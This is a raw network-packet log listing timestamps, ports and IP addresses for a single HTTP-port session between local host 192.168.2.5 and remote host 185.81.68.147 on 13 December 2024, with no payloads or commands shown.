Dec 13, 2024 01:37:36.030427933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030427933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030467033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030467033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030488014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030522108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030522108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030559063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030559063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030605078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030605078 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030637026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030694008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030694008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030694962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030738115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030738115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030770063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030798912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030798912 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030843019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030843019 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030884027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030884027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030920982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030920982 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030961037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.030961037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031008005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031008959 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031039953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031070948 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031100035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031131983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031172991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031209946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031209946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031246901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031246901 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031277895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031277895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031308889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031378031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031378031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031378031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031416893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031416893 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031455040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031455040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031492949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031492949 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031524897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031524897 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031560898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031560898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031598091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031598091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031635046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031635046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031666040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031666040 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031702042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.031702042 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.033349991 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033417940 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033679008 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033705950 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033715963 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033744097 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033780098 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033865929 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033874989 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.033880949 CET	80	49775	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:36.037722111 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.037758112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.037758112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.037822962 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.037858009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.037889004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.037911892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038109064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038146973 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038177967 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038213968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038213968 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038245916 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038264036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038285971 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038314104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038346052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038346052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038383007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038383007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038423061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038423061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038455009 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038568974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038605928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038605928 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038633108 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038651943 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038671017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038690090 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038724899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038724899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038762093 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038763046 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038781881 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038811922 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038837910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038870096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038888931 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.038918972 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039068937 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039104939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039104939 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039135933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039166927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039199114 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039264917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039264917 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039298058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039350986 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039351940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039351940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039388895 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039411068 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039437056 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039469957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039469957 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039510012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039510012 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039540052 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039575100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039575100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039752007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039788961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039788961 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039813995 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039834023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039868116 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039901018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039901018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039942026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039942026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039961100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039978027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.039994955 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040016890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040039062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040067911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040186882 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040224075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040224075 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040316105 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040354013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040433884 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040467024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040467024 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040522099 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040560007 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040620089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040620089 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040652037 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040672064 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040692091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.040724039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041063070 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041099072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041099072 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041126013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041146994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041250944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041285038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041285038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041320086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041320086 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041347027 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041366100 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041400909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041402102 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041436911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041436911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041456938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041474104 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041502953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041503906 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041549921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041549921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041580915 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041610003 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041640043 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041659117 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041695118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041695118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041726112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041758060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041758060 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041795015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041795015 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041836023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041856050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041887045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041887045 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041934013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041934013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.041934013 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042021990 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042068958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042104006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042145014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042188883 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042222977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042222977 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042259932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042259932 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042292118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042309999 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042347908 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042391062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042437077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042437077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042474985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042474985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042553902 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042591095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042591095 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042627096 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042628050 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042648077 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042665005 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042690992 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042721987 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042722940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042747974 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042767048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042818069 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042850018 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042880058 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042912006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042912006 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.042947054 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043095112 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043144941 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043221951 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043255091 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043289900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043289900 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043354034 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043389082 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043390036 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043416023 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043438911 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043462038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043488026 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043518066 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043549061 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043550014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043577909 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043596983 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043622017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043646097 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043673038 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043704033 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043735981 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043776035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043776035 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043814898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043814898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043845892 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043870926 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043872118 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043912888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043912888 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043945074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043972969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.043999910 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044028997 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044060946 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044087887 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044112921 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044131994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044159889 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044195890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044195890 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044226885 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044244051 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044276953 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044303894 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044333935 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044364929 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044394016 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044451952 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044481993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044500113 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044528008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044558048 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044604063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044631958 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044658899 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044692039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044692993 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044728994 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044766903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044766903 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044809103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044809103 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044831991 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044867039 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044899940 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044928074 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.044955969 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045007944 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045037985 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045103073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045103073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045103073 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045140028 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045167923 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045202017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045202017 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045228004 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045270920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045270920 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045305014 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045336008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045336008 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045376062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045376062 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045424938 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045455933 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045486927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045486927 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045520067 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045555115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045555115 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045587063 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045605898 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045634031 CET	49775	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:36.045669079 CET	49775	80	192.168.2.5	185.81.68.147
